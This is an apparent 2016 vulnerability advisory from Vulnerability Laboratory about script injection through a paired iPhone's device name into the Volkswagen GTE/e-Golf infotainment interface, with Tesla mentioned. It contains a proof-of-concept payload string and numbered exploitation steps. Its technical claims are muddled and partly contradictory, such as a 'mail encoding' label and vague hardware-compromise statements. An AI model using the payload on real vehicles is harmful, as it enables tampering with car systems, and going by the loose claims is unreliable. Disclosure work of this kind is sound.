Volkswagen (GTE&E) - (Interface Pair) Code Execution

Document Title:
===============
Volkswagen (GTE&E) - (Interface Pair) Code Execution


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1606


Release Date:
=============
2016-10-02


Vulnerability Laboratory ID (VL-ID):
====================================
1606


Common Vulnerability Scoring System:
====================================
7.6


Vulnerability Class:
====================
Filter or Protection Mechanism Bypass


Current Estimated Price:
========================
10.000€ - 25.000€


Product & Service Introduction:
===============================
Volkswagen is a German car manufacturer headquartered in Wolfsburg, Lower Saxony, Germany. 
Established in 1937, Volkswagen is the top-selling and namesake marque of the Volkswagen Group, 
the holding company created in 1975 for the growing company, and is now the biggest automaker globally. 
Volkswagen has three cars in the top 10 list of best-selling cars of all time compiled by the website 
24/7 Wall St.: the Volkswagen Golf, the Volkswagen Beetle, and the Volkswagen Passat. With these three 
cars, Volkswagen has the most cars of any automobile manufacturer in the list that are still being 
manufactured. Volkswagen places a top priority on things like perfection and tradition when it comes to 
electric vehicles. When we develop electric cars and plug-in hybrids our guiding principle is to achieve 
sustainable transport without making any compromises. Here is a look at all the vehicles in ourportfolio. 
Combining the efficiency of an electric engine with the power of a combustion engine, the new Passat GTE 
makes the perfect companion for almost every occasion.

(Copy of the Vendor Homepage: http://emobility.volkswagen.de/int/en/private/cars/ )


Abstract Advisory Information:
==============================
The Evolution Security GmbH and the Vulnerability Laboratory Core Research Team discovered during a private customer 
penetrationtest a high severity code execution vulnerability in the official VolksWagen (GTE &E) automobile hardware components.


Vulnerability Disclosure Timeline:
==================================
2016-10-02: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
An application-side code execution vulnerability in connection with a command injection issue has been 
discovered in the official Volkswagen (electro GTE & E-Golf) automobiles. The vulnerability allows to 
inject application-side code via command inject and tricks into a real script code execution in the 
embed car interface that is connected to the hardware components.

The vulnerability is located in the pair function of the cars when processing to use the device name. 
The device name becomes after a pair available to the full interface of the Tesla- or Volkswagen 
electro -automobile. Thus vector we used to attack the core system of the car. The ios devices allows 
to change the device name to any value including special chars and other chars.

Our team injected a payload to the device name. After that we installed a web-server app to the ios 
device (iphone 5s) and prepared locally some manipulated interface files in js for the final refresh 
(execution). After that interaction we paired the mobile to the automobiles and activated the scripts 
in the interface by opening via push the configuration settings. In the Volkswagen electro cars the 
payload executes directly after sync, in a Tesla car you need to watch the sync information to 
finally execute the code. After the execution of the code occurs in the VW display car interface 
the issue needs to be refreshed. When synchronized, the mobile comes to the local car wifi network, 
thus allows us to surf locally to the web-server by click on the payload in the car interface.

At the end we where able to manipulate the display information of the Volkswagen automobile and the 
interface of Tesla. By interaction through a reverse communication it is also possible to avoid hardware 
specific function to finally compromise the car by interaction via hardware. In case of the both different 
car types the issue becomes available because of the same way of implementation in the car entertainment 
system of Volkswagen and the embed browser interface.

Both parties include the device name with no secure implementation routine to filter the input, thus results 
in the execution finally. Regular script code tags and frame are already filtered.

The security risk of the persistent input validation and mail encoding web vulnerability is estimated as high 
with a cvss (common vulnerability scoring system) count of 7.6. Exploitation of the application-side command 
inject vulnerability with embed script code execution results in the compromise of the car interface and 
continuously manipulation of connected device, firmware or hardware components.

Vulnerable Module(s):
[+] Pair - (Wifi & Bluetooth)

Affected Module(s):
[+] Display - Volkswagen

Affected Automobil(s):
[+] Volkswagen - Electro GTE & E-Golf


Proof of Concept (PoC):
=======================
The application-side validation vulnerability in the vw car interface can be exploited 
by remote attackers with embed device access privileges and without user interaction. For security demonstration 
or to reproduce the security vulnerability follow the provided information and steps below to continue.

Requirement(s):
[+] iPhone 5s or iPad 2 (iOS 7.x or 8.x)
[+] Bluetooth or Wifi (Adapter or Hardware Implementation connected to the mobile Device)
[+] Wifi app for the mobile that uses a local web-server in the local network environment
[+] Volkswagen - Electro GTE & E-Golf with the new industrial interfaces (2015)


Optional Requirement(s):
[+] Network Sniffer to set between the local and mobile connection (for local network and mobile device on pair interaction)


Manual steps to reproduce the vulnerability ...
1. Setup an iOS device with for example iphone or an ipad
2. Install a web-server for wifi or bluetooth that becomes available in the local network environment
3. Activate bluetooth or wifi (better wifi because of the web-server)
4. Now go to info > settings > device name of iOS (iphone or ipad) and inject a script code payload that is able to bypass the validation
PoC Payload: "benjamin1&{alert('CarInterfaceUpdate')};%20>"<<a onmouseover=http://localhost:8080/index>refresh-volkswagen-webkit-interface&%20<img
src="http://localhost:8080/interface.js"></a>
5. Save the input of the device name to change the value finally
6. Now start the pair function of the Volkswagen electro car interface and sync the mobile
Note: Next to the sync via pair the device name of the mobile becomes available in the interface of the Volkswagen electro car interface display
7. Do not accept and watch the payload in the sync message
8. The payload executes in the interface on preview
9. Now the attacker interacts by starting the local web-server were with the files that are stored for simulation of the exploitation
10. After starting the web-server successful in the car WIFI network the attacker can click the payload to execute via a page refresh with the new web-server context
Note: Refreshing by a push to the interface with the link payload as interaction to trick the exploit code to execute
11. The attacker is now able to change the interface output and can interact to execute codes against the hardware specific points
12. Successful reproduce of the code execution vulnerability that is in connection with the device name value encoding!

Note: We was finally able to take-over the volkswagen car interface infotainment system by interaction with a compromised device, 
that uses a web-server next to the main pair interaction. Even if the Volkswagen electro cars are different the typ of nature on implementation 
then tesla with the pair, the a devicename permit is the same. Maybe other entertainment system or operating systems are affected as well. 
After recording the information with a network sniffer we where able to extract the package information on sync to provoke an execution 
without the device by a man in the middle attack.


Solution - Fix & Patch:
=======================
The security vulnerability in the interface of the tesla cars or the volkswagen automobile can be patched by a secure parse and encode the 
device cell name value when processing to pair (sync). Restrict the input that is available to be displayed and filter for malicious context 
that will be visible to the interface or display to prevent an execution. Include an exception to prevent the active exploitation after the 
pair interaction by an user.


Security Risk:
==============
The security risk of the command inject vulnerability in connection with the embed code execution issue is estimated as high.


Credits & Authors:
==================
Benjamin K.M. [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™